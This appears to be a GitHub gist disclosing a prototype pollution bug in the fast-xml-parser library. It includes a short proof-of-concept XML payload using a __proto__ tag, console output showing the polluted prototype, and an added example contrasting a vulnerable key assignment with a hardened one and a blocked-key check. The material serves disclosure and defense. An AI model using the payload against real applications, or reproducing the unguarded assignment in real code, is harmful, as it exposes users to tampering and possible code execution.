@Sudistark
Last active February 12, 2023 11:47

Taking example code from the GitHub repo to demonstrate the bug:

const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser");


let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>"

const parser = new XMLParser();
let jObj = parser.parse(XMLdata);


console.log(jObj.polluted) // should return hacked

[Screenshot: Code_G3UvvJcSv5]

In the above screenshot you can see that jObj was polluted with a new property.

jObj
>{}
jObj.__proto__
>{polluted: 'hacked'}
jObj.__proto__.polluted
>'hacked'

More information on prototype pollution can be found here: https://learn.snyk.io/lessons/prototype-pollution/javascript/

As it is common for developers to pass user-controllable input to XMLParser, this can lead to unexpected results. Chained with a prototype pollution gadget, it might even lead to RCE in some cases: https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
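The following added example (not code from this gist or from fast-xml-parser) shows why using a tag name such as `__proto__` as an object key swaps the object's prototype, next to a hardened assignment and a post-parse check. `buildNode`, `hasTamperedPrototype` and the `[tag, value]` entry format are hypothetical stand-ins for a parser's object-building step.

```javascript
// Added example: simplified stand-in for a parser that uses tag names as keys.
// NOT fast-xml-parser's code; buildNode and the entry format are hypothetical.
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// entries: array of [tagName, value]; value is a string or nested entries.
function buildNode(entries, { hardened }) {
  const node = {};
  for (const [tag, value] of entries) {
    const child = Array.isArray(value) ? buildNode(value, { hardened }) : value;
    if (!hardened) {
      // For tag === "__proto__" this hits the inherited setter and replaces
      // node's prototype instead of creating an own property.
      node[tag] = child;
      continue;
    }
    if (BLOCKED_KEYS.has(tag)) {
      throw new Error(`rejected tag name: ${tag}`);
    }
    // defineProperty always creates an own property, never calling the setter.
    Object.defineProperty(node, tag, {
      value: child, writable: true, enumerable: true, configurable: true,
    });
  }
  return node;
}

// Post-parse check: true if any plain object in the tree has a swapped prototype.
function hasTamperedPrototype(value) {
  if (value === null || typeof value !== "object") return false;
  const proto = Object.getPrototypeOf(value);
  if (!Array.isArray(value) && proto !== Object.prototype && proto !== null) {
    return true;
  }
  return Object.values(value).some(hasTamperedPrototype);
}

// Constructed input mirroring <__proto__><polluted>hacked</polluted></__proto__>.
const sample = [["__proto__", [["polluted", "hacked"]]]];

const weak = buildNode(sample, { hardened: false });
console.log(Object.keys(weak), weak.polluted, hasTamperedPrototype(weak));

let rejected = false;
try { buildNode(sample, { hardened: true }); } catch (e) { rejected = true; }
console.log("hardened build rejected input:", rejected);
```

The check flags the same state shown in the console output above: an object with no own keys whose prototype carries the attacker-supplied property.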
